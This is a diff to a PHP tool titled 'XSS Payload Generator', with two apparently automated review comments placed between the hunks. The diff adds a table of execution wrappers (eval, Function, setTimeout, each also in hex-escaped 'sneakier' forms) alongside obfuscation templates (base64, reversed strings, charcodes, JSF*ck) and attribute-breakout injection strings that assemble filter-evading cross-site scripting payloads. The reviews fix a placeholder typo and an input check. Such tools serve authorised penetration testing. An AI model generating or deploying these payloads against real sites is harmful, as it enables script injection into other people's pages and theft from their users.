diff --git a/generator.php b/generator.php index f464482..637f4e2 100644 --- a/generator.php +++ b/generator.php 
@@ -70,34 +70,87 @@ "code" => "{payload}" ], [ - "name" => "String eval", - "desc" => "Pass the payload as a string into eval()", - "code" => "eval('{payload}')" + "name" => "Pass as string", + "desc" => "Pass the payload as a string into an execution method", + "code" => "'{payload}'" ], [ "name" => "Base64 (atob())", - "desc" => "Base64 encode and execute using eval()", - "code" => "eval(atob('{payloadb64}'))" + "desc" => "Base64 encode", + "code" => "atob('{payloadb64}')" ], [ "name" => "Reverse", "desc" => "Reverse payload string and execute using eval()", - "code" => "eval('{payloadrev}'.split('').reverse().join(''))" + "code" => "'{payloadrev}'.split('').reverse().join('')" ], [ "name" => "String.fromCharCode()", "desc" => "Build payload string one char at a time using the ordinal value", - "code" => "eval({payloadchr})" + "code" => "{payloadchr}" ], [ "name" => "Character hex codes", "desc" => "Construct the payload using hex value of each character", - "code" => "eval('{payloadhex}')" + "code" => "'{payloadhex}'" ], [ "name" => "JSF*ck", "desc" => "Encode payload using only the characters []()!+", - "code" => "eval({payloadjsf})" + "code" => "{payloadjsf}" + ] + ]; + + $aExecution = [ + [ + "name" => "None", + "desc" => "No execution required", + "code" => "{obfuscated}" + ], + [ + "name" => "eval()", + "desc" => "Pass string to eval() function", + "code" => "eval({obfuscated})" + ], + [ + "name" => "window['eval']()", + "desc" => "Slightly sneakier way of calling eval()", + "code" => "window['eval']({obfuscated})" + ], + [ + "name" => "window['\\x65\\x76\\x61\\x6c']()", + "desc" => "Even sneakier way of calling eval()", + "code" => "window['\\x65\\x76\\x61\\x6c']({obfuscated})" + ], + [ + "name" => "Function()()", + "desc" => "Declare and execute an anonymous function", + "code" => "Function({obfuscated})()" + ], + [ + "name" => "window['Function']()()", + "desc" => "Slightly sneakier way of creating a new anonymous function", + "code" => 
"window['Function']({obfsucated})()" + ], + [ + "name" => "window['\\x46\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e']()()", + "desc" => "Even sneakier way of creating a new anonymous function", + "code" => "window['\\x46\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e']({obfuscated})()" + ], + [ + "name" => "setTimeout()", + "desc" => "Pass code string to the setTimeout() function", + "code" => "setTimeout({obfuscated},0)" + ], + [ + "name" => "window['setTimeout']()", + "desc" => "Slightly sneakier way of calling the setTimeout() function", + "code" => "window['setTimeout']({obfuscated},0)" + ], + [ + "name" => "window['\\x73\\x65\\x74\\x54\\x69\\x6d\\x65\\x6f\\x75\\x74']()", + "desc" => "Even sneakier way of calling the setTimeout() function", + "code" => "window['\\x73\\x65\\x74\\x54\\x69\\x6d\\x65\\x6f\\x75\\x74']({obfuscated},0)" ] ]; @@ -130,22 +183,22 @@ [ "name" => "img element onerror", "desc" => "Inject an invalid element with the payload within onerror", - "code" => "" + "code" => "" ], [ "name" => "SVG element", "desc" => "Inject an SVG element containing the payload within onload", - "code" => "" + "code" => "" ], [ "name" => "Element onclick", "desc" => "Break out of an element attribute and add an onclick event", - "code" => "'\" onclick={payload}>" + "code" => "'\" onclick={payload} >" ], [ "name" => "Element onmouseover", "desc" => "Break out of an element attribute and add an onmouseover event", - "code" => "'\" onmouseover={payload}>" + "code" => "'\" onmouseover={payload} >" ] ]; @@ -522,8 +575,8 @@ // Logic for generating a payload function generatePayload( $form ){ - global $aPayloads, $aObfuscation, $aInjections; - $required = ['payloadid','injectionid','obfuscationid']; + global $aPayloads, $aObfuscation, $aExecution, $aInjections; + $required = ['payloadid','injectionid','obfuscationid','executionid']; foreach( $required as $item ){ if( !in_array( $item, array_keys( $form ) ) ) return $item." not provided"; } 
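Review bot: The `window['Function']()()` entry in the new `$aExecution` table spells its placeholder `{obfsucated}`, so the `str_replace( '{obfuscated}', ... )` added in `generatePayload()` will not match it and the output will carry the literal token; it should read `{obfuscated}` like the other nine entries. The "Reverse" entry's description still says "execute using eval()" although the `eval(` wrapper was moved out of its template, so `"desc" => "Reverse payload string"` would match the edited Base64 entry. The "sneakier" descriptions would be more useful in a test report if they named what is being exercised. For example, eval, Function and string-argument setTimeout are all string-to-code sinks that a Content-Security-Policy without `'unsafe-eval'` blocks however the call is spelled, whereas a filter matching the literal text `eval(` does not.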
@@ -573,6 +626,13 @@ } $rtn['obfuscated'] = $code; + // Add into execution method + if( !in_array( $form['executionid'], array_keys( $aExecution ) ) ) $form['executionid'] = 0; + $execution = $aExecution[$form['executionid']]; + $rtn['meta']['execution'] = $execution; + $code = str_replace( '{obfuscated}', $rtn['obfuscated'], $execution['code'] ); + $rtn['execute'] = $code; + // Insert into injection string if( !in_array( $form['injectionid'], array_keys( $aInjections ) ) ) $form['injectionid'] = 0; $injection = $aInjections[$form['injectionid']]; @@ -598,7 +658,7 @@ XSS Payload Generator
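Review bot: The added `executionid` check compares loosely (`in_array()` without its strict flag, against `array_keys()`), so a value that equals a key under `==` without being one passes; examples are `'1 '`, or any non-numeric string on PHP 7, where it equals `0`. `$aExecution[$form['executionid']]` is then an undefined index, leaving `$execution` null and `$rtn['execute']` empty, with warnings. `$form` looks request-derived (its origin is not visible in this hunk), so I would normalise the id before indexing: `$eid = filter_var( $form['executionid'], FILTER_VALIDATE_INT );`, then `if( $eid === false || !isset( $aExecution[$eid] ) ) $eid = 0;` and `$execution = $aExecution[$eid];`. The `injectionid` context line just below uses the same loose pattern and would want the same treatment. `generatePayload()` starts and ends outside this hunk.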
+
+ + +
+